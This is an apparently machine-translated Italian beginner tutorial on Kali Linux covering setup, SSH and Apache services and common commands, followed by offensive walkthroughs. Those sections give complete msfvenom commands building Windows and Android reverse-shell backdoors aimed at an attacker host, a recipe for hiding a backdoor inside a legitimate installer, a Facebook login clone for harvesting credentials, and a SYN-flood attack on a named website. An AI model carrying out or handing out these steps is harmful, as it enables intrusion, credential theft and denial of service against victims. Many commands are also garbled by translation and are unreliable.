Perché dovresti usare Kali Linux?
Kali Linux è utilizzato principalmente da tester di penetrazione, revisori di sicurezza, ricercatori e ricercatori forensi. Ha quasi tutti gli strumenti o lo script preinstallati che possono essere utilizzati per uno qualsiasi degli scopi di cui sopra. Puoi usare Kali Linux per crack WiFi Networks, per eseguire Open Source Intelligence (OSINT) su qualcuno, per hackerare siti Web e reti e molti altri.
Oltre all'hacking etico, Kali Linux ha anche una serie di strumenti per l'indagine forense. La forense è un'altra filiale di sicurezza importante ed emergente il cui scopo principale è quello di raccogliere e analizzare le prove di un'attività criminale e quindi di tornare indietro. L'indagine forense aiuta a rintracciare e rimuovere effetti dannosi (backdoor, malwares) è derivato da un'attività criminale e calcolando/gestisce la perdita dopo un attacco informatico. Kali Linux ha una modalità live invisibile separata per le operazioni "forensi" in cui non lascia l'impronta digitale sul sistema host.
Mettersi a proprio agio con l'ambiente di Kali
Kali non è realizzato per utenti ordinari e non è molto user-friendly come Windows o Ubuntu. Il suo ambiente predefinito è root, il che non è molto facile da usare ed è piuttosto pericoloso per Noobs. Manca anche alcune utility di base come SNAP, VirtualBox e altre utility che sono presenti in Ubuntu.
Prima cosa prima
La prima cosa da fare è creare un utente non root
root@kali: ~# adduser kali
Aggiunta di "kali" dell'utente ..
Aggiunta di un nuovo gruppo "Kali" (1002) ..
Aggiunta di un nuovo utente "Kali" (1002) con il gruppo "Kali" ..
Creazione di Home Directory '/Home/Kali' ..
Copia di file da "/etc/skel" ..
Nuova password:
... Snip ..
root@kali: ~# usermod -ag sudo kali
Inizializza il database PostgreSQL di Metasploit Framework
root@kali: ~# msfdb init
Creazione dell'utente del database 'MSF'
Immettere la password per il nuovo ruolo:
Inseriscilo di nuovo:
Creazione di database 'msf' e 'msf_test'
... Snip ..
Aggiungi le seguenti righe al tuo “/etc/apt/fonti.Elenco "file
deb http: // http.Kali.Org/Kali Kali Rolling Main Contributo non libero
# Per l'accesso al pacchetto di origine, rimborso la seguente riga
# deb-src http: // http.Kali.Org/Kali Kali Rolling Main Contributo non libero
Installa alcuni altri strumenti utili.
root@kali: ~# apt -get update && apt upgrade -y
root@kali: ~# apt-get Installa VirtualBox VirtualBox-Dkms Gobuster Tor Tor-Browser
OpenVPN Htop Atom Deepin -Terminal Tilix -y
Gestire i servizi predefiniti di Kali
Kali viene fornito con molti servizi non standard preinstallati come PostgreSQL, MySQL, SSH, HTTP. Se non configurati correttamente, questi servizi avranno inizio come un processo di fondo quando il tuo Kali Linux si avvia e queste porte aperte possono essere una minaccia per la sicurezza del tuo sistema.
In questa sezione, esamineremo come funzionano questi servizi e come puoi configurarli correttamente e come usarli. Il modo standard di configurazione di uno strumento o di un servizio viene letto il suo file di docum. Il file README contiene la procedura standard per configurare e utilizzare uno strumento o un servizio. I file README si trovano di solito nella cartella "/usr/share/doc/[strumento_name]/readme".
Servizio Shell Secure (SSH)
Secure Shell (SSH) è stato utilizzato a lungo come strumento standard per eseguire a distanza comandi, file di trasferimento e altri scopi di amministrazione remoto. Il pacchetto include SSH (client) e SSHD (servizio) per controllare le altre macchine in remoto.
Il servizio SSH non viene avviato per impostazione predefinita quando Kali si avvia, è possibile avviarlo digitando,
root@kali: ~ $ SERVIZI SSH Avvia
root@kali: ~ $ netstat -antp | grep -i sshd
TCP 0 0 0.0.0.0:22 0.0.0.0:* Ascolta 6601/SSHD
TCP6 0 0 ::: 22 :::* Ascolta 6601/SSHD
Se vuoi che sshd inizi ogni volta quando i tuoi kali si avvolgono. Tipo
root@kali: ~ $ update-rc.d ssh abilita
Se vuoi che qualcuno accedi al tuo PC tramite SSH, utilizzerà il nome utente e la password del tuo Kali per l'autenticazione di accesso. Quindi è meglio cambiare la password predefinita "Toor" in qualcosa di sicuro.
root@kali: ~ $ passwd
Modifica della password per root.
Password attuale:
Nuova password:
Riprovare la nuova password:
Passwd: password aggiornata correttamente
Ora ricarica il servizio SSH per influire sulle modifiche
root@kali: ~ $ service ssh ricarica
Servizio HTTP
Il servizio HTTP è molto vantaggioso durante l'esecuzione di attività correlate all'hacking etico. Può essere utilizzato per ospitare pagine Web e sito Web di phishing falsi, per trasferire file a server delle vittime remote. Con le applicazioni Web che diventano più popolari ogni giorno, ora è più importante avere conoscenze per comprendere e gestire i server HTTP come Apache.
Apache è un server HTTP che viene preinstallato in Kali. Il servizio HTTP di Apache è disabilitato per impostazione predefinita, ma è possibile avviarlo utilizzando il comando seguente.
root@kali: ~ $ servizio apache2 avvia
Apache ospiterà la sua pagina Web Deful predefinita sul dominio locale alla porta HTTP standard 80. Vai su http: // localhost: 80/
Per iniziare ogni volta quando inizia il tuo kali, digita
root@kali: ~ $ update-rc.d apache2 abilita
È inoltre possibile configurare Apache sulla porta non standard modificando il suo file di configurazione (/etc/apache2/porte.conf)
root@kali: ~ $ nano/etc/apache2/porte.conf
Salva il file e quindi esegui
root@kali: ~ $ servizio apache2 riavvio
Ora, Apache sarà server sulla porta "1234" anziché sulla porta standard 80.
Se si desidera leggere la documentazione completa di Apache Server, visitare la directory “/usr/share/doc/apache2/”, digita
root@kali: ~ $ cd/usr/share/doc/apache2/
root@kali:/usr/share/doc/apache2 $ gzip -decomprime readme.Debian.Gz
root@kali:/usr/share/doc/apache2 $ nano readme.Debian
Un elenco di alcuni comandi utili
individuare viene utilizzato per individuare un file in Linux, prima di utilizzare questo comando, è necessario aggiornare prima il database
root@kali: ~# aggiornatob
root@kali: ~# localizza uqjhssvf.jpeg
/root/uqjhssvf.jpeg
Trovare è più aggressivo e non si basa sul database. Cerca ricorsivamente il file nella directory e nelle sue sottodirectory.
root@kali: ~# trova ./ -name main.Py
./Desktop/main.Py
Wget Può essere utilizzato per scaricare una pagina Web o un file nel terminale.
root@kali: ~# wget tinytuba.com
--2019-05-11 08: 58: 48-- http: // tinytuba.com/
Risoluzione di Tinytuba.com (tinytuba.com)… 52.216.129.66
Connessione a Tinytuba.com (tinytuba.com) | 52.216.129.66 |: 80 ... collegato.
Richiesta http inviata, in attesa di risposta ... 200 ok
Lunghezza: 1551 (1.5K) [Testo/HTML]
Salvataggio su: 'indice.html '
indice.HTML 100%[==========================>] 1.51k --.-Kb/s in 0s
2019-05-11 08:58:50 (56.5 mb/s) - 'indice.Html 'salvato [1551/1551]
root@kali: ~# indice Firefox.html
superiore Ti dà informazioni sulla tua CPU, sull'utilizzo della memoria e su altre statistiche.
storia Mostra l'elenco dei comandi precedenti che hai inserito nel tuo terminale.
Alcuni altri comandi utili che puoi trovare su Internet sono LS, RM, RMDIR, Adduser, Deluser, Service, Nano, Cat, More, Less, Uname, Whoami eccetera
Generare backdoor dannosi
Puoi generare binari exe dannosi usando "msfvenom" kali linux e installarli sul sistema di qualcun altro per controllarlo in remoto.
root@kali: ~ $ msfvenom -a x86 -platform windows -b '\ x00' -p Windows/MeterPreter/reverse_tcp
Lhost = [indirizzo IP dell'attaccante] lport = [porta dell'attaccante n.] -F exe> divertimento.exe
Trovati 11 encoder compatibili
Tentare di codificare il carico utile con 1 iterazioni di x86/shikata_ga_nai
x86/shikata_ga_nai è riuscito con la dimensione 368 (iterazione = 0)
x86/shikata_ga_nai scelto con dimensione finale 368
Dimensione del payload: 368 byte
Dimensione finale del file EXE: 73802 byte
root@kali: ~ $ ls divertimento.exe
divertimento.exe
root@kali: ~ $ file divertente.exe
divertimento.EXE: PE32 Executable (GUI) Intel 80386, per MS Windows
Per generare backdoor per i sistemi di Windows di architettura X64, digita il seguente comando.
root@kali: ~ $ msfvenom -platform windows -b '\ x00' -p Windows/x64/meterpreter/reverse_tcp
Lhost = [indirizzo IP dell'attaccante] lport = [porta dell'attaccante n.] -F exe> divertimento.exe
[-] Nessun arco selezionato, selezione dell'arco: x64 dal payload
Trovati 3 encoder compatibili
... Snip ..
root@kali: ~ $ file divertente.exe
divertimento.EXE: PE32+ Executable (GUI) X86-64, per MS Windows
Incorporare backdoor in applicazioni legittime usando kali
Puoi anche incorporare il tuo codice backdoor dannoso in un file exe innocuo come Adobe Reader Installer o alcuni per leggi multimediali. L'eseguibile retrodoored risultante sembrerà un'applicazione software legittima, ma quando eseguita sul computer della vittima, eseguirà la tua backdoor dannosa insieme a quella legittima applicazione, con conseguente compromesso del PC della vittima.
Ci sono alcuni eseguibili Windows già presenti in Kali Linux, che useremo per dimostrazione.
root@kali: ~ $ ls/usr/share/windows-binaries/
backdoors/ exe2bat.exe fport/ klogger.exe nbtenum/ plink.exe vncviewer.exe whoami.exe
enumplus/ fgdump/ hyperion/ mbenum/ nc.exe radmin.exe wget.exe
Inietteremo il nostro carico utile in "Vncviewer.Exe ”eseguibile.
root@kali: ~ $ msfvenom -a x86 -Platform Windows -x/usr/share/windows -binaries/vncviewer.exe
-k -p windows/meterpreter/reverse_tcp lhost = [attaccante] lport = [porta dell'attaccante]
-E x86/shikata_ga_nai -i 3 -b "\ x00" -f exe -o vncviewer.exe
Trovati 1 encoder compatibile
Tentare di codificare il carico utile con 3 iterazioni di x86/shikata_ga_nai
... Snip ..
Dimensione del payload: 422 byte
Dimensione finale del file EXE: 421376 byte
Salvato come: vncviewer.exe
Generare backdoor Android
Per controllare a distanza i telefoni Android, è possibile generare file APK dannosi utilizzando MSFvenom.
root@kali: ~ $ msfvenom -p android/meterpreter/reverse_tcp lhost = [IP dell'attaccante]
Lport = [porta dell'attaccante no] r> qualunque cosa.APK
[-] Nessuna piattaforma è stata selezionata, scegliendo msf :: module :: piattaforma :: Android dal payload
[-] Nessun arco selezionato, selezione dell'arco: Dalvik dal payload
Nessun encoder o BadChars specificato, che produce payload non elaborato
Dimensione del payload: 10087 byte
Ingegneria sociale usando setoolkit
L'ingegneria sociale è l'uso dell'inganno per indurre qualcuno a rivelare le loro informazioni riservate o personali che possono essere utilizzate in modo improprio per scopi dannosi.
La tecnica più comunemente usata di ingegneria sociale è il phishing, in cui si tenta di inviare messaggi, e -mail o chiamate telefoniche per ottenere informazioni personali, in particolare le informazioni relative al denaro. Nell'attacco di phishing, il ricevitore di un'e -mail è convinto di aver ricevuto l'e -mail da una fonte autentica come una banca o un dipartimento governativo, e poi ingannato per rivelare le sue credenziali sensibili.
In questa dimostrazione, cloneremo una pagina di accesso di Facebook utilizzando setoolkit e ospiterà quella pagina sul nostro server HTTP, quindi invieremo l'indirizzo IP del nostro server HTTP alla vittima. Quando le vittime accedono alla nostra falsa pagina di accesso a Facebook, questa pagina invierà il suo nome utente e la sua password alla nostra macchina Kali.
Tipo setoolkit Nel terminal, verrà aperto setoolkit
Quando la vittima inserisce il nostro indirizzo IP nel suo browser, gli verrà presentata la nostra falsa pagina di accesso di Facebook che abbiamo creato in precedenza. Dobbiamo aspettare fino a quando la vittima entra nel suo nome utente e password nella nostra pagina clonata. La pagina Facebook falsa sembrerà così,
Finché l'utente inserisce le sue credenziali, Setoolkit le mostrerà sul terminale.
Questa demo era sulla rete locale, se vuoi farlo su PI pubblico, è necessario eseguire il trasferimento di porte sul router o puoi utilizzare NGROK per l'IP pubblico e il numero di porta.
Denial of Service (DOS) Attack con Metasploit
L'attacco Denial of Service (DOS) è un tipo di attacco a un sistema o una rete che diminuisce o limita l'accessibilità delle risorse di sistema ai suoi utenti legittimi. Lo scopo di un attacco DOS non è quello di rubare informazioni sensibili, invece l'attaccante cerca di inondarsi il sistema delle vittime con richieste di servizi non legali per sovraccaricare le proprie risorse.
Un attacco di negazione del servizio distribuito (DDoS) necessita di un gran numero di sistemi (indicati come zombi) che attaccano un singolo bersaglio, con conseguente negazione del servizio. Un singolo attacco DOS non può influire su grandi server e reti aziendali, ecco perché DDoS è più efficace e letale. È anche difficile rintracciare e bloccare l'attacco DDOS perché centinaia e migliaia di sistemi di zombi attaccano un singolo host.
Sono molti strumenti e script disponibili per gli attacchi DOS e DDoS, ma useremo un modulo ausiliario di Metasploit per la dimostrazione. Cercheremo di abbattere un sito Web di esempio "www.Jarusa.com ".
Innanzitutto, vai su https: // www.isitdownRightNow.com/ e conferma che il sito Web è attivo e in esecuzione
Il sito web è scaduto. Ora, Open Metasploit Framework Console nel tuo terminale.
root@kali: ~ $ msfconsole
... Snip ..
MSF5> Usa ausiliario/dos/tcp/synflood
Scoprire www.Jarusa.comIndirizzo IP e impostalo come rhost e poi esegui l'attacco
Dopo un po ', vedrai che il sito Web non è disponibile. Confermalo usando https: // www.isitdownRightNow.com/
Kali Linux è una casa per gli hacker etici e questo tutorial ti abbia illuminato alle basi di Kali Linux, cosa può fare e come iniziare con il suo utilizzo.